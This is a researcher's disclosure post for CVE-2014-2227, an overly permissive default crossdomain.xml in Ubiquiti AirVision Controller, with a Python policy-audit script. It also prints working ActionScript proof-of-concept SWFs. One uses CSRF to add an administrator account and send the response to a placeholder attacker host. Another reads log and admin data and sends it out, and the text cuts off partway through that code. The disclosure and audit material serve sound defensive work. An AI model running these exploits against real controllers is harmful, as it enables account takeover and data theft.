This CVE covers a vulnerability found in the Ubiquiti Networks AirVision application. For more background on this particular vulnerability, check out this post:<br />
<br />
<a href="http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html" target="_blank">Exploiting misconfigured crossdomain.xml files</a><br />
<div>
<br /></div>
<div>
In fact, I wrote that first crossdomain.xml blog post after finding this AirVision vulnerability back in February. If you already read that post, you should recognize that the vulnerable form I use for the POC here (adding an administrator) is the same one I used earlier.</div>
<div>
<br /></div>
<div>
Here is a cleaned up version of what I sent to Ubiquiti back in February:<br />
<br />
<h1 dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #2e74b5; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml</span></h1>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-264: </span><a href="http://cwe.mitre.org/data/definitions/264.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/264.html</span></a><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br />
<div>
<b><u>Misuse Case</u></b></div>
<div>
<br /></div>
<div>
<span style="color: blue;">If the victim user is authenticated with their AirVision Controller, and they visit a malicious site, the owner of the malicious site can make changes to, and read data from, the AirVision Controller. The malicious site can even add a new administrative user account. </span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Vulnerable default configuration:</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="254px;" src="https://lh3.googleusercontent.com/L9EZPENjUAo8DKZCtd4x3_IwEO6xcBb2k-NaebevoLACzHy8s88Pu3IWrSkHFVhfiemS4Wzuv7eKc5cdCO26Vij3Z0zb6JBIsFFMWcXCjpf1YZFkq-1Vl-k7K_mxYH3j02o2km1tgqc" style="-webkit-transform: rotate(0rad); border: none;" width="602px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POC:</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>Step 1:</b> The attacker hosts the malicious SWF on their own server and socially engineers a victim AirVision administrator, who is currently logged in, into viewing the SWF file.<br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>Step 2: </b>The victim, while logged into AirVision, views the SWF file on the attacker's server:<br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="62px;" src="https://lh3.googleusercontent.com/NnrdzwtTW_9EVFHqsa5-PiA3Bsjo9Ypg50jaamO5Ddewjp43uZjTuj_IAtVGsEO_yuwsuM91fffIUbJJ2Qe058Emqlq3a_nACg2UWjKLX_EhQW0Xi964JziC3nssz4hz7RcTPnhHxXg" style="-webkit-transform: rotate(0rad); border: none;" width="605px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="54px;" src="https://lh5.googleusercontent.com/uPnlSMK7_8UxoaQ8AsudJuQEZ1CMMp89n8rnkCnYtLeMyuRfe9XGe_TF4f3jF5C8G-2PNZ0EHcmuV6PK_e2xaG1cTk7aizJ_LI6YpFt3IvjFpT8vXN1iuFr29V-6tSwti3IJedc8sKA" style="-webkit-transform: rotate(0rad); border: none;" width="494px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Step 3:</span></b><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> The SWF loads on the victim's machine and makes a request on behalf of the victim (exploiting CSRF to add an administrator):</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="287px;" src="https://lh3.googleusercontent.com/E6Fe7o3CbQj2wqiW-FFlkX3d26wxcuTJspKmuAovCRpPjJVychkxQ3F9VUQITPfDaKXK4c-ORKbuA8ko2KH6nwTuNdJN1D2_GdryRVJy0L33BbKlxtV5IDe7xqapaPlzNiDyNwYmow8" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Response:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="244px;" src="https://lh5.googleusercontent.com/dL-Pf78AVMYAO_tBPpg1_7luXYgeRR9bnPibZ6WtTNXLjX_ZLxBTDo20fBrE9gaXyN7ScwMXG69w4mnnzzT84Zc_GDBmdEaYIjK7wJWH-Y4dYn5wSwkm_vZ1aiqaYk2G0iVKaoiRQrs" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>Step 4: </b>Because the overly permissive crossdomain.xml file lets the SWF bypass the Same-Origin Policy, the SWF can also read the server's response to the previous request; it records that response and sends it to the attacker:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="233px;" src="https://lh4.googleusercontent.com/xN9QwKK3gJa5vAbatv9IjCdc300vI41Bw93qJkM7bDg37ISH9gWM4xlcizpUABNmvcYPCsLsHiKJPGLrAx7uq3SZhT0MvcAnWzCxk164AT-paLUzTqepe05IMxf-8y--Cl9OOb1AvLE" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The attacker's server receives the information and responds with an HTTP 200 OK. </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="253px;" src="https://lh5.googleusercontent.com/FyOVInWVphGVZIEueiRCuDvUd5A-ew1ZrFSGiX_EGiQVokAyUVQnI30LXrTNi1CvlpK0lZNdlxuMKiO33B-LSJcpnGaeBNAq3fYUfKPjR9QoR1eyxbKUEIpJdhCxvCn_i7An5TLA6iM" style="-webkit-transform: rotate(0rad); border: none;" width="449px;" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Here is another example of how an attacker could exploit this vulnerability, one that CSRF alone cannot achieve because it depends on reading the response. In the screenshot below, the SWF makes a request to /api/2.0/log?type=error. The SWF then reads the data that comes back from that request and sends it to the attacker’s server, where the attacker consumes the raw data.</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<br />
<div dir="ltr" style="-webkit-text-stroke-width: 0px; color: black; font-family: Times; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 1; margin-bottom: 0pt; margin-top: 0pt; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="259px;" src="https://lh3.googleusercontent.com/ZQujzD6NAslweprDVE2HGoerJaO6QuIUWCYnv-lgyUvuC2wWfA3ECSV-_kuQhLChGqqlLFtYZNxPXteDOoVkT9FGSb8Eq9gXsK3qxFV8HIhtJfG5wlvp3lZwjxqdM0muvwGNCXEK6q0" style="-webkit-transform: rotate(0rad); border: none; cursor: move;" width="624px;" /></span></div>
</div>
<br /></div>
<br />
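<p>The policy that makes all of the above possible is a small XML file, so it can be audited before it ships and re-checked after every deployment. The script below is an added example written for this post; it is not Ubiquiti's code and not the author's SWF tooling. It parses a crossdomain.xml file with Python's standard library and flags the settings that hand any website on the Internet read access to an authenticated user's session: a wildcard domain, a wildcard over an entire TLD, secure="false", wildcard custom headers, and a site-control setting that lets any XML on the site act as a policy. The two sample policies are constructed for the example (the AirVision default is only shown in the screenshot above), and static.example.com in the hardened sample is a placeholder for whatever host legitimately serves your SWFs. The trusted_domains helper reports the same thing the nmap script output at the top of this page calls TRUSTED DOMAINS.</p>

```python
"""Audit a Flash crossdomain.xml policy for overly permissive settings.

Added example for this post (not Ubiquiti's or the post author's code).
Sample policies are constructed inline so the script runs offline.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the classic "whitelist the entire Internet" policy.
VULNERABLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# Constructed sample: only one named host is trusted. static.example.com is a
# placeholder for the host that legitimately serves your SWFs.
HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.com" secure="true"/>
</cross-domain-policy>
"""


def trusted_domains(policy_xml: str) -> list[str]:
    """Return the domain patterns the policy grants access to."""
    root = ET.fromstring(policy_xml)
    return [el.get("domain", "") for el in root.iter("allow-access-from")]


def audit_policy(policy_xml: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: list[str] = []
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return [f"root element is <{root.tag}>, not <cross-domain-policy>; "
                "Flash Player ignores such a file"]

    for sc in root.iter("site-control"):
        if sc.get("permitted-cross-domain-policies") == "all":
            findings.append("site-control permits 'all': any XML the site "
                            "serves can act as a policy file")

    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append("allow-access-from domain='*': every site on the "
                            "Internet is trusted")
        elif domain.startswith("*.") and "." not in domain[2:]:
            # *.example.com is a normal subdomain wildcard; *.com trusts a whole TLD
            findings.append(f"allow-access-from domain='{domain}': wildcard "
                            "covers an entire TLD")
        if el.get("secure", "true").lower() == "false":
            findings.append(f"allow-access-from domain='{domain}' secure='false': "
                            "plain-HTTP origins may read this HTTPS site's responses")

    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append("allow-http-request-headers-from domain='*': any "
                            "site may send custom request headers")

    return findings


if __name__ == "__main__":
    for name, policy in (("vulnerable", VULNERABLE_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"[{name}] trusted domains: {trusted_domains(policy)}")
        for finding in audit_policy(policy) or ["no findings"]:
            print(f"  - {finding}")
```

<p>Point audit_policy at the file fetched from the target's web root; an empty findings list is the goal. The hardened sample shows what that looks like in practice: named hosts only, no secure="false", and site-control set to master-only so a stray XML file elsewhere on the site cannot be loaded as a second policy.</p>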
<div dir="ltr" style="margin-left: 0pt;">
Additional details:<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">(</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2227) - </span><span style="font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks - AirVision v2.1.3 - Overly Permissive default crossdomain.xml</span><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Vendor: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks (http://www.ubnt.com/)</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Affected Products/Versions: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller v2.1.3</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Note: Previous versions may be affected</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Description:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Title: </span><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Overly Permissive default crossdomain.xml file</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE: CVE-2014-2227</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CWE: CWE-264: </span><a href="http://cwe.mitre.org/data/definitions/264.html" style="text-decoration: none;"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/264.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Researcher: Seth Art - @sethsec</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Detailed writeup (includes screenshots): </span><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2227.html" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://sethsec.blogspot.com/2014/07/cve-2014-2227.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">------------------------------------------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">POC #1: Using crossdomain.xml to execute CSRF and add an administrator:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">------------------------------------------------------------------------------------------------------</span></div>
<br />
<pre>
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github: (<a href="https://github.com/gursev/flash-xdomain-xploit">https://github.com/gursev/flash-xdomain-xploit</a>)
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;
    import flash.net.URLRequestHeader;

    public class XDomainXploit3 extends Sprite {
        public function XDomainXploit3() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "https://victim:7443/api/2.0/admin";
            var header:URLRequestHeader = new URLRequestHeader("Content-Type",
                "text/plain; charset=UTF-8");
            var readRequest:URLRequest = new URLRequest(readFrom);
            readRequest.method = URLRequestMethod.POST;
            // JSON body of the "add administrator" form, sent with the victim's session
            readRequest.data =
                "{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";
            readRequest.requestHeaders.push(header);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        // Runs once the response has been read; reading it cross-origin is only
        // possible because the permissive crossdomain.xml trusts this SWF's origin
        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php";
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
</pre>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">POC #2: Using crossdomain.xml to exfiltrate log data:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------------------------------------</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// Customized AirVision POC Author: Seth Art (</span><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">sethsec at gmail.com</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// POC Template Author: Gursev Singh Kalra (</span><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">gursev.kalra at foundstone.com</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// POC Template Author's github: (</span><a href="https://github.com/gursev/flash-xdomain-xploit" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/gursev/flash-xdomain-xploit</span></a><span style="background-color: white; color: #555555; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">package {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.display.Sprite;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.events.*;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLRequestMethod;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLRequest;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLLoader;</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> public class XDomainXploit extends Sprite {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> public function XDomainXploit() {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> // Target URL from where the data is to be retrieved</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var readFrom:String = "/victim:7443/api/2.0/admin";</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var readRequest:URLRequest = new URLRequest(readFrom);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var getLoader:URLLoader = new URLLoader();</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> getLoader.addEventListener(Event.COMPLETE, eventHandler);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> try {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> getLoader.load(readRequest);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> } catch (error:Error) {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> trace("Error loading URL: " + error);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> private function eventHandler(event:Event):void {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> // URL to which retrieved data is to be sent</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendTo:String = "</span><a href="http://www.malicious-site.com/admin" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.malicious-site.com/admin</span></a><span style="background-color: white; color: #555555; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendRequest:URLRequest = new URLRequest(sendTo);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendRequest.method = URLRequestMethod.POST;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendRequest.data = event.target.data;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendLoader:URLLoader = new URLLoader();</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> try {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
